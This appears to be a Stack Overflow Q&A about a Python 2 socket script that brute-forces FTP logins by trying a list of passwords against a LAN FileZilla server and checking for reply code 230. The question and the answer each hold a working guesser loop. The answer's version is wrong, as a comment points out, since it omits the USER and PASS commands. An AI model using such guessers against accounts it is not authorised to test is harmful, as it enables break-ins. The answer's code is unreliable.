# Python ftp not sending password

Tags: python, python-2.7, ftp, filezilla

I was working on making a FTP brute force program using python and I am having a problem sending the password. The s.send sends the user name properly, but then it fails and does not send the password it just quits. I need it to input the user name of the account, then input the password and then check it the code attempt was = 230. I am running python on linux, not python3 and running my file ftp server on filezilla and I can connect to the server using my machine.

```
import socket

import re

import sys

def connect(username, password):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Trying to" + username + ":" + password
    s.connect(('192.168.2.237', 21))
    data = s.recv(1024)
    s.send('USER ' + username + '\r\n')
    data = s.recv(1024)
    s.send('PASS ' + password + '\r\n')
    data = s.recv (3)
    s.send('QUIT\r\n')
    s.close()
    return data
username = "admin"
passwords =["none", "test", "none"]
for password in passwords:
    attempt = connect(username, password)
    if attempt=="230":
        print "Password found: " + password
        sys.exit(0)
```

Comment: [`https://docs.python.org/2/library/ftplib.html`](https://docs.python.org/2/library/ftplib.html)

Comment: `data = s.recv(1024)
s.send('USER ' + username + '\r\n')
data = s.recv(1024)
s.send('PASS ' + password + '\r\n')` why are you sending USER,PASS? you should `send s.send(username + '\r\n') , s.send('PASS ' + password + '\r\n')`

Comment: Your code works for me just fine using Python 2.7.14.

Comment: Yah i fixed it, problem with my FTP

Answer (score -1):

There are libraries available for FTP you can use them easily. If you still want to achieve it with socket module try below. You are not passing username and password properly

```
import socket

import re

import sys

def connect(username, password):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Trying to " + username + ":" + password
    s.connect(('10.2.16.15', 21))
    data = s.recv(1024)

    s.send(username + '\r\n')
    data = s.recv(1024)

    s.send( password + '\r\n')
    data = s.recv (3)
    print data
    s.send('QUIT\r\n')
    s.close()
    return data
username = "root"
passwords =["lade", "whopee", "oho"]
for password in passwords:
    attempt = connect(username, password)
    if attempt=="230":
        print "Password found: " + password
        sys.exit(0)
```

output

```
Trying to root:lade
530
Trying to root:whopee
530
Trying to root:oho
530
```

Comment: Ok I have it inputing the passwords into the ftp, thanks for that. But when the correct password is input it only displays the 530 which is the error for login or password incorrect, but when I does the proper password it also print 530 but it should be printing 230.

Comment: Actually the OP is sending the username and password correctly, using the `USER` and `PASS` FTP commands. Your code is just wrong.

Comment: @MartinPrikryl : Yes my bad. OP code works in Python2.7.4